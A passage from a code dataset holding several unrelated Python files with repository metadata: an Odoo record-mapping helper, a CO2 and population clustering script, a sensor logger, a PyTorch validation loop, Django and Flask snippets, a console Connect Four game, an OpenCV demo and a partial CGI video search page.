'x_studio_frombranch', 'x_studio_tobranch'])\n m2o_company = m2o_model.field_id.sudo().filtered(lambda x: x.relation == 'res.company' and x.ttype == 'many2one')\n # Special case for res.users object.\n # It will always have 2 many2one related to business type, because mirror\n # behavior of company\n if m2o_model.model == 'res.users':\n m2o_business_type = m2o_model.field_id.sudo().filtered(lambda x: x.relation == 'fal.business.type' and x.ttype == 'many2one' and x.name == 'fal_business_type')\n # Special case for Partner. Because ADMS split it's partner to customer and vendor\n # Both table have different approach\n if m2o_model.model in ['res.partner']:\n # Split between Customer / Vendor Transaction.\n if model.model in ['purchase.order', 'purchase.order.line']:\n # Let's find it on business type level first, if not found, search again on company level\n real_id = self.env[field.relation].sudo().search([('x_studio_adms_id', '=', vals[key]), (m2o_business_type.name, '=', business_type.id), (m2o_company.name, '=', business_type.company_id.id), ('supplier_rank', '>', 0)], limit=1)\n if not real_id:\n real_id = self.env[field.relation].sudo().search([('x_studio_adms_id', '=', vals[key]), (m2o_company.name, '=', business_type.company_id.id), ('supplier_rank', '>', 0)], limit=1)\n else:\n # Let's find it on business type level first, if not found, search again on company level\n real_id = self.env[field.relation].sudo().search([('x_studio_adms_id', '=', vals[key]), (m2o_business_type.name, '=', business_type.id), (m2o_company.name, '=', business_type.company_id.id), ('customer_rank', '>', 0)], limit=1)\n if not real_id:\n real_id = self.env[field.relation].sudo().search([('x_studio_adms_id', '=', vals[key]), (m2o_company.name, '=', business_type.company_id.id), ('customer_rank', '>', 0)], limit=1)\n elif m2o_model.model in ['x_reason_adms']:\n real_id = self.env[field.relation].sudo().search([('x_studio_adms_id', '=', vals[key])], limit=1)\n elif m2o_model.model in ['account.tax']:\n if model.model in ['x_po_tax', 'purchase.order.line']:\n real_id = self.env[field.relation].sudo().search([('x_studio_adms_id', '=', vals[key]), (m2o_business_type.name, '=', business_type.id), ('type_tax_use', '=', 'purchase')], limit=1)\n else:\n real_id = self.env[field.relation].sudo().search([('x_studio_adms_id', '=', vals[key]), (m2o_business_type.name, '=', business_type.id), ('x_studio_adms_id', '=', vals[key]), ('type_tax_use', '=', 'sale')], limit=1)\n elif business_type and m2o_business_type and m2o_model.model not in model_exception:\n real_id = self.env[field.relation].sudo().search([('x_studio_adms_id', '=', vals[key]), (m2o_business_type.name, '=', business_type.id)], limit=1)\n # Let's find it on business type level first, if not found, search again on company level\n if not real_id:\n real_id = self.env[field.relation].sudo().search([('x_studio_adms_id', '=', vals[key]), (m2o_company.name, '=', business_type.company_id.id)], limit=1)\n # If the object doesn't have business type\n else:\n real_id = self.env[field.relation].sudo().search([('x_studio_adms_id', '=', vals[key])], limit=1)\n new_vals[key[17:]] = real_id.id\n new_vals[key] = vals[key]\n # Other field we just copy-paste\n else:\n new_vals[key] = vals[key]\n return new_vals\n\n def check_method(self, model, record):\n if model.model == 'purchase.order':\n if record.x_studio_journal_apvo or record.x_studio_journal_apvo_retur:\n return False\n else:\n return True\n elif model.model == 'x_adms_po_header':\n if record.x_studio_issue_journal:\n return False\n else:\n return True\n elif model.model == 'sale.order':\n if record.x_studio_issue_entry or record.invoice_ids or record.x_studio_transfer_journal or record.x_studio_issue_journal_cancel or record.x_studio_invoice_journal_cancel:\n return False\n else:\n return True\n elif model.model == 'x_spk_payment_multi':\n if record.x_studio_bon_merah:\n return False\n else:\n return True\n elif model.model == 'x_spk_payment':\n if record.x_studio_bon_hijau:\n return False\n else:\n return True\n elif model.model == 'x_inventory_transfer':\n if record.x_studio_journal_keluar_1 or record.x_studio_journal_masuk_2 or record.x_studio_journal_masuk:\n return False\n else:\n return True\n elif model.model == 'x_importinvadj':\n if record.x_studio_journal_out or record.x_studio_journal_in:\n return False\n else:\n return True\n return True\n","repo_name":"dionisiotorres/atists","sub_path":"fal_arista_adms_helper/models/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":14887,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"18867163879","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sun Jan 15 12:59:23 2023\n\n@author: User\n\"\"\"\nimport pandas as pd\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport scipy.optimize as opt\nimport seaborn as sns\nfrom sklearn import cluster\nimport err_ranges as err\n\ndef data_(filename):\n \"\"\"\n Parameters\n ----------\n filename : TYPE\n DESCRIPTION.\n\n Returns\n -------\n d_t : TYPE\n DESCRIPTION.\n data : TYPE\n DESCRIPTION.\n\n \"\"\"\n data = pd.read_csv(filename)\n data = pd.DataFrame(data)\n print(data) \n print(data.columns)\n # drop null values in rows as part of data cleaning\n data = data.drop([\"Indicator Code\",\"Indicator Name\",\"Country Code\",\"2021\",\"2020\"],axis=1)\n # replacing the NaN value with 0\n data = data.replace(np.NaN,0)\n # choosing the country\n u = [\"Benin\",\"Bangladesh\",\"Bahrain\",\"Brazil\",\"Colombia\",\"Canada\"]\n # checking the value in is in function\n dt = data[\"Country Name\"].isin(u)\n data = data[dt]\n print(data)\n # transposing the data\n d_t = np.transpose(data)\n # resetting the index\n d_t = d_t.reset_index()\n # renaming thge value\n d_t = d_t.rename(columns={\"index\":\"year\"})\n d_t = d_t.drop(0,axis=0)\n #data = data.iloc[:,0:10]\n d_t = d_t.rename(columns={18:\"Benin\",20:\"Bangladesh\",22:\"Bahrain\",29:\"Brazil\",35:\"Colombia\",45:\"Canada\"})\n d_t[\"year\"] = pd.to_numeric(d_t[\"year\"])\n d_t[\"Bahrain\"] = pd.to_numeric(d_t[\"Bahrain\"])\n d_t[\"Brazil\"] = pd.to_numeric(d_t[\"Brazil\"])\n d_t[\"Canada\"] = pd.to_numeric(d_t[\"Canada\"])\n d_t = d_t.dropna()\n return d_t,data\ndef exp_(t,n0, g):\n \"\"\"\n Calculates the logistic function with scale factor n0 and growth rate g\n\n \"\"\"\n t = t - 1960.0\n f = n0 * np.exp(g*t)\n return f\ndef set_mat(country):\n \"\"\"\n function to show scatter_matrix of each country \n \"\"\"\n pd.plotting.scatter_matrix(country, figsize=(14.0, 12.0))\n plt.tight_layout()\n plt.show()\n# calling function for filename\nbdata,borg = data_(\"D:\\\\applaid_last_prj\\\\data_set\\\\Birth rate, crude (per 1,000 people).csv\")\npop,poporg = data_(\"D:\\\\applaid_last_prj\\\\data_set\\\\Population, total.csv\")\nEPC,EPC_org = data_(\"D:\\\\applaid_last_prj\\\\data_set\\\\Electric power consumption (kWh per capita).csv\")\nco2_emmission,co2_emmission_org = data_(\"D:\\\\applaid_last_prj\\\\data_set\\\\CO2 emissions (kt).csv\")\n# creating behrain as a dataframe and adding another indicators to it\nBahrain = pd.DataFrame()\nBahrain[\"Year\"] = bdata[\"year\"]\nBahrain[\"Population_total\"] = pop[\"Bahrain\"]\nBahrain[\"Electric_power_consumption\"] = EPC[\"Bahrain\"]\nBahrain[\"co2_emission\"] = co2_emmission[\"Bahrain\"]\nBahrain = Bahrain.iloc[30:60,:]\n# creating Brazil as a dataframe and adding another indicators to it\nBrazil = pd.DataFrame()\nBrazil[\"Year\"] = bdata[\"year\"]\nBrazil[\"Population_total\"] = pd.to_numeric(pop[\"Brazil\"])\nBrazil[\"Electric_power_consumption\"] = EPC[\"Brazil\"]\nBrazil[\"co2_emission\"] = co2_emmission[\"Brazil\"]\nBrazil = Brazil.iloc[30:69,:]\n# creating Canada as a dataframe and adding another indicators to it\nCanada = pd.DataFrame()\nCanada[\"Year\"] = bdata[\"year\"]\nCanada[\"Population_total\"] = pd.to_numeric(pop[\"Canada\"])\nCanada[\"Electric_power_consumption\"] = EPC[\"Canada\"]\nCanada[\"co2_emission\"] = co2_emmission[\"Canada\"]\nCanada = Canada.iloc[30:60,:]\n\n# calling the function\nset_mat(Bahrain)\nset_mat(Brazil)\nset_mat(Canada)\n\n# plotting the correlation of bahrain\nplt.figure()\nplt.title(\"Correlation map of Bahrain\")\ncor = Bahrain.corr()\nsns.heatmap(data=cor,annot=False,cmap=\"jet\")\nplt.show() \n \n# kmean clustering Bahrain\nkmean = cluster.KMeans(n_clusters=2,max_iter=30)\n# reshaping \nptlg = np.array(Bahrain[\"Electric_power_consumption\"]).reshape(-1,1)\nspe = np.array(Bahrain[\"co2_emission\"]).reshape(-1,1)\n# concatinte \ncl = np.concatenate((ptlg,spe),axis=1)\n# fitting the model\nkmean = kmean.fit(cl)\n# assignining the label\nlabel = kmean.labels_\n# finding the centers for cluster\nkm_c = kmean.cluster_centers_\ncol = [\"Electric_power_consumption\",\"co2_emission\"]\nlabels = pd.DataFrame(label,columns=['Cluster ID'])\nresult = pd.DataFrame(cl,columns=col)\n# concat result and labels\nres = pd.concat((result,labels),axis=1)\n# plotting the cluster\nplt.figure()\nplt.title(\"BAHRAIN Electric_power_consumption vs co2_emission \")\nplt.scatter(res[\"Electric_power_consumption\"],res[\"co2_emission\"],c=label,cmap=\"jet\")\nplt.xlabel(\"Electric_power_consumption\")\nplt.ylabel(\"co2_emission\")\n# plotting centers of clusters\nfor ic in range(2):\n xc, yc = km_c[ic,:]\n plt.plot(xc, yc, \"dk\", markersize=7,c=\"black\")\nplt.show()\n\n# kmean clustering Brazil\nkmean = cluster.KMeans(n_clusters=2,max_iter=30)\n# reshaping \nptlg = np.array(Brazil[\"Electric_power_consumption\"]).reshape(-1,1)\nspe = np.array(Brazil[\"co2_emission\"]).reshape(-1,1)\n# concatinte \ncl = np.concatenate((ptlg,spe),axis=1)\n# fitting the model\nkmean = kmean.fit(cl)\n# assignining the label\nlabel = kmean.labels_\n# finding the centers of cluster\nkm_c = kmean.cluster_centers_\ncol = [\"Electric_power_consumption\",\"co2_emission\"]\nlabels = pd.DataFrame(label,columns=['Cluster ID'])\nresult = pd.DataFrame(cl,columns=col)\nres = pd.concat((result,labels),axis=1)\nplt.figure()\nplt.title(\"BRAZIL Electric_power_consumption vs co2_emission \")\nplt.scatter(res[\"Electric_power_consumption\"],res[\"co2_emission\"],c=label,cmap=\"jet\")\nplt.xlabel(\"Electric_power_consumption\")\nplt.ylabel(\"co2_emission\")\nfor ic in range(2):\n xc, yc = km_c[ic,:]\n plt.plot(xc, yc, \"dk\", markersize=7,c=\"black\")\nplt.show()\n\n# kmean clustering Canada\nkmean = cluster.KMeans(n_clusters=2,max_iter=30)\n# reshaping \nptlg = np.array(Canada[\"Electric_power_consumption\"]).reshape(-1,1)\n# reshaping \nspe = np.array(Canada[\"co2_emission\"]).reshape(-1,1)\n# concatinate\ncl = np.concatenate((ptlg,spe),axis=1)\n# fitting the model\nkmean = kmean.fit(cl)\n# assignining the label\nlabel = kmean.labels_\n# finding the centers of cluster\nkm_c = kmean.cluster_centers_\ncol = [\"Electric_power_consumption\",\"co2_emission\"]\nlabels = pd.DataFrame(label,columns=['Cluster ID'])\nresult = pd.DataFrame(cl,columns=col)\nres = pd.concat((result,labels),axis=1)\n# plotting the cluster\nplt.figure()\nplt.title(\"CANADA Electric_power_consumption vs co2_emission \")\nplt.scatter(res[\"Electric_power_consumption\"],res[\"co2_emission\"],c=label,cmap=\"jet\")\nplt.xlabel(\"Electric_power_consumption\")\nplt.ylabel(\"co2_emission\")\nfor ic in range(2):\n xc, yc = km_c[ic,:]\n plt.plot(xc, yc, \"dk\", markersize=7,c=\"black\")\nplt.show()\n\n# Bahrain\n# normalising the value \nBahrain[\"NORM_CO2_emission\"] = Bahrain[\"co2_emission\"]/Bahrain[\"co2_emission\"].abs().max() \nprint(Bahrain)\n# curve fitting\nparam,cparm = opt.curve_fit(exp_,Bahrain[\"Year\"],Bahrain[\"NORM_CO2_emission\"],p0=[4e8,0.2])\n# error value\nsigma = np.sqrt(np.diag(cparm))\n# assigning low and up error ranges\nlow,up = err.err_ranges(Bahrain[\"Year\"],exp_,param,sigma)\nBahrain[\"fit\"] = exp_(Bahrain[\"Year\"],*param)\n# plotting the fit with error ranges\nplt.figure()\nBahrain.plot(\"Year\",[\"NORM_CO2_emission\",\"fit\"])\nplt.fill_between(Bahrain[\"Year\"],low,up,alpha=0.5)\nplt.legend()\nplt.show()\n# plotting the prediction\nplt.figure()\nplt.title(\"CO2 emission of Bahrain\")\nplt.plot(Bahrain[\"Year\"],Bahrain[\"NORM_CO2_emission\"],label=\"benin\")\n# taking some extra years for prediction\npred_year = np.arange(1990,2040)\nbpred = exp_(pred_year,*param)\nplt.plot(pred_year,bpred,label=\"prediction\")\nplt.legend()\nplt.show()\n\n# BRAZIL\n# normalising the value\nBrazil[\"NORM_CO2_emission\"] = Brazil[\"co2_emission\"]/Brazil[\"co2_emission\"].abs().max() \n#curve fitting\nparam,cparm = opt.curve_fit(exp_,Brazil[\"Year\"],Brazil[\"NORM_CO2_emission\"],p0=[4e8,0.1])\nprint(*param)\n# error value\nsigma = np.sqrt(np.diag(cparm))\n# assigning low and up error ranges\nlow,up = err.err_ranges(Brazil[\"Year\"],exp_,param,sigma)\nBrazil[\"fit\"] = exp_(Brazil[\"Year\"],*param)\n# plotting the fit with error ranges\nplt.figure()\nBrazil.plot(\"Year\",[\"NORM_CO2_emission\",\"fit\"])\nplt.fill_between(Brazil[\"Year\"],low,up,alpha=0.5)\nplt.show()\n# plotting the prediction\nplt.figure()\nplt.title(\"CO2 emmission of BRAZIL\")\nplt.plot(Brazil[\"Year\"],Brazil[\"NORM_CO2_emission\"],label=\"Brazil\")\npred_year = np.arange(1990,2040)\nbrapred = exp_(pred_year,*param)\nplt.plot(pred_year,brapred,label=\"prediction\")\nplt.legend()\nplt.show()\n\n# CANADA\n# normalising the value\nCanada[\"NORM_CO2_emission\"] = Canada[\"co2_emission\"]/Canada[\"co2_emission\"].abs().max()\n#curve fitting\nparam,cparm = opt.curve_fit(exp_,Canada[\"Year\"],Canada[\"NORM_CO2_emission\"],p0=(73233967692.102798,0.04))\nprint(*param)\n# assigning low and up error ranges\nlow,up = err.err_ranges(Canada[\"Year\"],exp_,param,sigma)\nCanada[\"fit\"] = exp_(Canada[\"Year\"],*param)\n# plotting the fit with error ranges\nplt.figure()\nCanada.plot(\"Year\",[\"NORM_CO2_emission\",\"fit\"])\nplt.fill_between(Canada[\"Year\"],low,up,alpha=0.5)\nplt.legend()\nplt.show()\n# plotting the prediction\nplt.figure()\nplt.title(\"CO2 emmission of CANADA\")\nplt.plot(Canada[\"Year\"],Canada[\"NORM_CO2_emission\"],label=\"Canada\")\npred_year = np.arange(1990,2040)\ncapred = exp_(pred_year,*param)\nplt.plot(pred_year,capred,label=\"prediction\")\nplt.legend()\nplt.show()\n","repo_name":"fahad-roshan/ADS_ass_3","sub_path":"final.py","file_name":"final.py","file_ext":"py","file_size_in_byte":9107,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"10988197042","text":"fdata = '/home/astroberry/python/.tempdata.dat'\n\nfrom allsky.DHTsensor import *\nimport time, datetime\n\ndef WriteData():\n timestring = datetime.datetime.now().strftime(\"%Y %m %d %H %M %S\")\n hum, temp = GetTempAndHumSafe(5)\n data = \"%s %1.1f %1.1f\\n\"%(timestring, hum, temp)\n with open(fdata, \"a\") as f:\n f.write(data)\n\nwhile 1:\n WriteData()\n time.sleep(5)\n\n\n","repo_name":"CerecedaObs/AllSky","sub_path":"scripts/WriteTempData.py","file_name":"WriteTempData.py","file_ext":"py","file_size_in_byte":366,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"15356528328","text":"import os\nimport torchvision\nimport torch\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom datetime import datetime\nfrom torch.utils.tensorboard import SummaryWriter\n\nfrom dataset import SkinDetectionDataset\nfrom skindetectionnet import SkinDetectionNet\nfrom utils import *\n\nwriter = SummaryWriter()\n\n# get our dataset\nroot_dir = r'.\\dataset'\ndataset_val = SkinDetectionDataset(root_dir, 'val')\n\n# indices = torch.randperm(len(dataset)).tolist()\n# dataset_train = torch.utils.data.Subset(dataset, indices[:5])\n# dataset_test = torch.utils.data.Subset(dataset, indices[5:])\n\n# load our model and set directory for saving model parameter\nmodel_pth = r'.\\model_pth\\final_epoch_20_2019-12-08 02_38_19.840335.pkl'\n# model_pth = r'.\\model_pth\\final_epoch_20_2019-12-08 01_35_29.027475.pkl'\n\nmodel = SkinDetectionNet()\n\nis_run_in_gpu = True\nif is_run_in_gpu == True:\n device=torch.device(\"cuda:0\" if torch.cuda.is_available() else \"cpu\")\n model=model.to(device)\n\nmodel.eval()\n\n# record start time\nbegin_time = datetime.now()\nprint(\"begin val: \", begin_time)\n\ndata_loader_val = torch.utils.data.DataLoader(dataset_val, batch_size=1, shuffle=False)\n# validate process\nfor i, data in enumerate(data_loader_val):\n\n input, ground_truth = data\n\n if is_run_in_gpu == True:\n input = input.cuda()\n\n val_image_start_time = datetime.now()\n output = model(input.float())\n val_image_end_time = datetime.now()\n\n output = output.squeeze(axis=0)\n\n if is_run_in_gpu == True:\n output = output.cpu().detach()\n\n # calculate iou\n output[output > 0] = 1\n output[output < 0] = 0\n\n output = np.squeeze(output.numpy(), axis=0)\n ground_truth = np.squeeze(ground_truth.numpy(), axis=0)\n iou = calculate_iou(output, ground_truth)\n\n print(\"image:{}, iou:{}, cost time:{}\".format(i, iou, val_image_end_time - val_image_start_time))\n\n source_image_tag = \"image {}/\".format(i)\n writer.add_image(source_image_tag, input.squeeze(dim=0))\n\n ground_truth_tag = \"image {}/ground_truth\".format(i, iou)\n writer.add_image(ground_truth_tag, ground_truth[np.newaxis,:])\n\n val_result_tag = \"image {}/val result/iou: {}\".format(i, iou)\n writer.add_image(val_result_tag, output[np.newaxis,:])\n\nwriter.close()\n\n# record end time\nend_time = datetime.now()\nprint(\"end train: \", end_time)\nprint(\"time cost: {}s\".format((end_time-begin_time).seconds))","repo_name":"BingqiangZhou/skin_detection","sub_path":"val.py","file_name":"val.py","file_ext":"py","file_size_in_byte":2381,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"26634996304","text":"from django.contrib import admin\n\nfrom .models import Question, Answer\n\n\nclass AnswerInline(admin.StackedInline):\n model = Answer\n extra = 10\n\n\nclass QuestionAdmin(admin.ModelAdmin):\n fields = ['title', 'text', 'author']\n inlines = [AnswerInline]\n\n\nadmin.site.register(Question, QuestionAdmin)\n","repo_name":"Leonid-T/Question-Answer-site","sub_path":"ask/qa/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":306,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"29344947908","text":"import logging\r\nfrom functools import wraps\r\n\r\nfrom flask import Blueprint, request, jsonify, Response\r\n\r\nfrom api.api_except import MyException\r\nfrom helpers import *\r\n\r\napi = Blueprint('api', __name__, url_prefix=\"\")\r\n\r\nlogging.basicConfig(format='%(asctime)s : %(levelname)s : %(message)s', level=logging.INFO)\r\n\r\n\r\ndef validate_input(view_function):\r\n @wraps(view_function)\r\n def func(*args, **kwargs):\r\n try:\r\n input_data = request.get_json(silent=True, force=True)\r\n if not input_data:\r\n raise MyException('No input data')\r\n query = input_data.get(\"query\")\r\n if query is None:\r\n raise MyException(\"'query' is a required property\")\r\n # one of: exp, elk, bio\r\n scenario = str(input_data.get(\"scenario\"))\r\n if scenario is None:\r\n raise MyException(\"'scenario' is a required property\")\r\n if scenario not in [con.ELK, con.EXPANDED, con.BIOASQ]:\r\n raise MyException(\"choose from '{}', '{}', '{}' for 'scenario'\".format(con.ELK, con.EXPANDED, con.BIOASQ))\r\n response = view_function(query, scenario)\r\n return response\r\n except MyException as e:\r\n return Response(json.dumps({'error': e.error_msg}), status=400, mimetype='application/json')\r\n return func\r\n\r\n\r\n@api.route('/search', methods=['POST'])\r\n@validate_input\r\ndef read_query(*args):\r\n query = args[0]\r\n scenario = args[1]\r\n res = query_search(query, scenario)\r\n return jsonify(res)\r\n\r\n'''\r\n@api.route('/search-elk', methods=['POST'])\r\ndef search_elk():\r\n input_data = request.get_json(silent=True, force=True)\r\n # queries = input_data.get(\"query\")\r\n if not input_data:\r\n res = {'error': 'No input data'}\r\n return jsonify(res)\r\n query = input_data.get(\"query\")\r\n\r\n docs, meta = query_search(query)\r\n res = dict()\r\n res['docs'] = docs\r\n res['meta'] = meta\r\n return jsonify(res)\r\n\r\n\r\n@api.route('/search-bio', methods=['POST'])\r\ndef search_elk():\r\n input_data = request.get_json(silent=True, force=True)\r\n # queries = input_data.get(\"query\")\r\n if not input_data:\r\n res = {'error': 'No input data'}\r\n return jsonify(res)\r\n query = input_data.get(\"query\")\r\n\r\n docs, meta = query_search(query)\r\n res = dict()\r\n res['docs'] = docs\r\n res['meta'] = meta\r\n return jsonify(res)\r\n'''","repo_name":"xstsp/bio-query-expansion","sub_path":"api/controllers.py","file_name":"controllers.py","file_ext":"py","file_size_in_byte":2425,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"61"} +{"seq_id":"2137066646","text":"# Steven Vi 74537668 Duy Lam 61502602 Lab 12 pm-1:50 pm Project 2\r\n# Console Version\r\n\r\nimport connectfour\r\n\r\ndef new_game_state():\r\n return connectfour.new_game()\r\n\r\ndef userInput(game_state: 'GameState'):\r\n game_board = game_state\r\n columns = connectfour.BOARD_COLUMNS\r\n## winner = winner_is_chosen(game_board)\r\n try:\r\n while winner_is_chosen(game_board) == connectfour.NONE:\r\n userInput = input('Input what action you want first then number:\\n').strip().lower()\r\n usercommand = userInput.split()\r\n if usercommand[0] == 'drop':\r\n if (columns >= int(usercommand[1]) > 0):\r\n game_board = drop_piece(game_board, int(usercommand[1])-1)\r\n print_connectfour = print_board(game_board)\r\n current_turn = _game_state_turn(game_board)\r\n elif usercommand[0] == 'pop':\r\n if 0 < int(usercommand[1]) <= columns: \r\n game_board = pop_piece(game_board, int(usercommand[1])-1)\r\n print_connectfour = print_board(game_board)\r\n current_turn = game_state_turn(game_board)\r\n else:\r\n print('The column number you specified is not correct. Try again.')\r\n else:\r\n print('ERROR.')\r\n game_board = game_board\r\n except connectfour.InvalidMoveError: #This handles when the user is putting in full column or cannot pop at that spot\r\n print('Action connect be fulfilled. Try again.')\r\n game_board = userInput(game_board)\r\n except ValueError: #This handles the user input when they input the wrong thing.\r\n print('The second command is not correct. Try again')\r\n game_board = userInput(game_board)\r\n except TypeError:\r\n print('The number you tried to input is a string.')\r\n game_board = userInput(game_board)\r\n\r\n finally:\r\n print('Game is over.')\r\n\r\n \r\ndef drop_piece(game_state: 'GameState', col_num: int):\r\n new_state = connectfour.drop(game_state, col_num)\r\n return new_state\r\n\r\ndef pop_piece(game_state: 'GameState', col_num: int):\r\n new_state = connectfour.pop(game_state, col_num)\r\n return new_state\r\n\r\ndef print_board(game_state):\r\n board_state = game_state.board\r\n columnNum = []\r\n board = []\r\n \r\n for i in range(0, connectfour.BOARD_COLUMNS):\r\n columnNum.append(i+1)\r\n board.append(columnNum)\r\n for i in range(0, connectfour.BOARD_ROWS):\r\n rowList = []\r\n for a in range(0, connectfour.BOARD_COLUMNS):\r\n rowList.append(board_state[a][i])\r\n board.append(rowList)\r\n for i in range(0, connectfour.BOARD_COLUMNS):\r\n print(board[0][i], end = ' ')\r\n print()\r\n \r\n converted = []\r\n for i in range(1, len(board)):\r\n row = []\r\n for a in range(0, len(board[i])):\r\n if board[i][a] == 0:\r\n row.append('.')\r\n elif board[i][a] == 1:\r\n row.append('R')\r\n elif board[i][a] == 2:\r\n row.append('Y')\r\n converted.append(row)\r\n for i in range(0, connectfour.BOARD_ROWS):\r\n for a in range(0, connectfour.BOARD_COLUMNS):\r\n print(converted[i][a] , end = ' ')\r\n print()\r\n \r\n\r\ndef winner_is_chosen(game_state):\r\n winner = connectfour.winner(game_state)\r\n if winner == connectfour.NONE:\r\n return winner\r\n else:\r\n return winner\r\n\r\ndef _game_state_turn(game_state: 'GameState'):\r\n if winner_is_chosen(game_state) == connectfour.NONE:\r\n if game_state.turn == 1:\r\n print('It is Red\\'s turn.')\r\n elif game_state.turn == 2:\r\n print('It is now Yellow\\'s turn.')\r\n elif winner_is_chosen(game_state) != connectfour.NONE:\r\n if winner_is_chosen(game_state) == 1:\r\n print('Red is the winner.')\r\n elif winner_is_chosen(game_state) == 2:\r\n print('Yellow is the winner')\r\n\r\nif __name__ == '__main__':\r\n new_game = new_game_state()\r\n userInput(new_game)\r\n","repo_name":"dblam/Duy-s-Python-Projects","sub_path":"PYTHON 32/Project 2/Console1.py","file_name":"Console1.py","file_ext":"py","file_size_in_byte":4082,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"33324593217","text":"from rx.subjects import ReplaySubject\n\nfrom riptide.config import repositories\nfrom riptide.config.document.config import Config\nfrom riptide.config.files import riptide_main_config_file\nfrom riptide_mission_control.graphql_entities.subscriptions.utils import async_in_executor, try_loading_project, \\\n ResultStep\nfrom riptide_mission_control.registry import registry\n\n\n@async_in_executor\nasync def update_repositories_impl(subject: ReplaySubject):\n subject.on_next(ResultStep(\n steps=2,\n current_step=1,\n text=\"Starting repository update...\"\n ))\n try:\n repositories.update(registry().system_config, lambda msg: subject.on_next(ResultStep(\n steps=2,\n current_step=1,\n text=msg\n )))\n except Exception as e:\n subject.on_next(ResultStep(\n steps=2,\n current_step=1,\n text=\"Fatal error during repository update: \" + str(e),\n is_end=True,\n is_error=True\n ))\n subject.on_completed()\n return\n subject.on_next(ResultStep(\n steps=2,\n current_step=2,\n text=\"Reloading configuration...\"\n ))\n\n # Reload system config\n try:\n config_path = riptide_main_config_file()\n system_config = Config.from_yaml(config_path)\n system_config.validate()\n registry.system_config = system_config\n except FileNotFoundError as e:\n subject.on_next(ResultStep(\n steps=2,\n current_step=2,\n text=\"Main config file not found! Could not reload system config.\",\n is_end=True,\n is_error=True\n ))\n except Exception as e:\n subject.on_next(ResultStep(\n steps=2,\n current_step=2,\n text=\"Could not reload system config: \" + str(e),\n is_end=True,\n is_error=True\n ))\n else:\n subject.on_next(ResultStep(\n steps=2,\n current_step=2,\n text=\"Repository update done!\",\n is_end=True\n ))\n finally:\n subject.on_completed()\n\n\n@async_in_executor\nasync def update_images_impl(subject: ReplaySubject, project_name: str):\n subject.on_next(ResultStep(\n steps=1,\n current_step=1,\n text=\"Starting image update...\"\n ))\n\n project = try_loading_project(project_name, subject, 1, 1)\n if not project:\n return\n\n try:\n registry().engine.pull_images(project,\n line_reset=\"\",\n update_func=lambda msg: subject.on_next(\n ResultStep(\n steps=1,\n current_step=1,\n text=msg\n )\n ))\n subject.on_next(ResultStep(\n steps=1,\n current_step=1,\n text=\"Done updating images!\",\n is_end=True\n ))\n except Exception as ex:\n subject.on_next(ResultStep(\n steps=1,\n current_step=1,\n text=\"Error updating an image: \" + str(ex),\n is_end=True,\n is_error=True\n ))\n finally:\n subject.on_completed()\n pass","repo_name":"theCapypara/riptide-mission-control","sub_path":"riptide_mission_control/graphql_entities/subscriptions/misc.py","file_name":"misc.py","file_ext":"py","file_size_in_byte":3360,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"70347576195","text":"import cv2 # python-opencv\nimport numpy as np\n\n\nprint(\"Координаты точки A(x1;y1):\")\nx1 = int(input(\"\\tx1 = \"))\ny1 = int(input(\"\\ty1 = \"))\n\nprint(\"Координаты точки B(x2;y2):\")\nx2 = int(input(\"\\tx2 = \"))\ny2 = int(input(\"\\ty2 = \"))\n\nimg = np.zeros((512, 512, 3), np.uint8)\n\n\ncv2.line(img, (x1, y1), (x2, y2), (255, 0, 0), 3, cv2.LINE_8)\ncv2.imshow(\"line\", img)\ncv2.waitKey(0)\ncv2.destroyAllWindows()\n\nprint(\"Уравнение прямой, проходящей через эти точки:\")\nk = (y1 - y2) / (x1 - x2)\nb = y2 - k*x2\nprint(\" y = %.2f*x + %.2f\" % (k, b))\n","repo_name":"alisanaydenysheva/StudyPractice","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":599,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"22952036473","text":"#!/usr/bin/env python3\r\n# -*- coding: utf-8 -*-\r\nimport cgi\r\nimport sys\r\nimport codecs\r\nimport html\r\nimport crawlerfile\r\nimport imp\r\nimport urllib\r\nimport urllib.request\r\nimport os\r\nfrom bs4 import BeautifulSoup\r\nfrom urllib.parse import urljoin\r\nfrom urllib.parse import urlparse\r\nimport postgresql\r\nimport sqlite3\r\nignorewords=set(['the','of','to','and','a','in','is','it'])\r\nsys.stdout = codecs.getwriter(\"utf-8\")(sys.stdout.detach())\r\n\r\nform = cgi.FieldStorage()\r\ntext1 = form.getfirst(\"TEXT_1\", \"не задано\")\r\ntext1=text1.lower()\r\n#text2 = form.getfirst(\"TEXT_2\", \"не задано\")\r\ntext1 = html.escape(text1)\r\n#text2 = html.escape(text2)\r\n\r\ne=crawlerfile.searcher('searchindex.db')\r\ntry:\r\n qq=e.queryvid(text1)\r\n q1=qq[0]\r\n q2=qq[1]\r\n q3=qq[2]\r\nexcept:\r\n pass\r\n\r\nprint(\"Content-type: text/html\\n\")\r\nprint(\"\"\"\r\n\r\n\r\n\r\nОбработка данных форм\r\n\r\n\r\n\r\n^Наверх\r\n
\r\n\r\n
\r\n
\r\n \r\n
\r\n
\r\n\tEnter query\r\n \r\n \r\n
\r\n \"\"\")\r\nfor i in q2[0]:\r\n if (i[0].find('embed') == -1):\r\n continue\r\n else:\r\n print(\"\"\"\"\"\".format(i[0]))\r\n print(\"

{}

\".format(format(q3[0])))\r\n print(\"
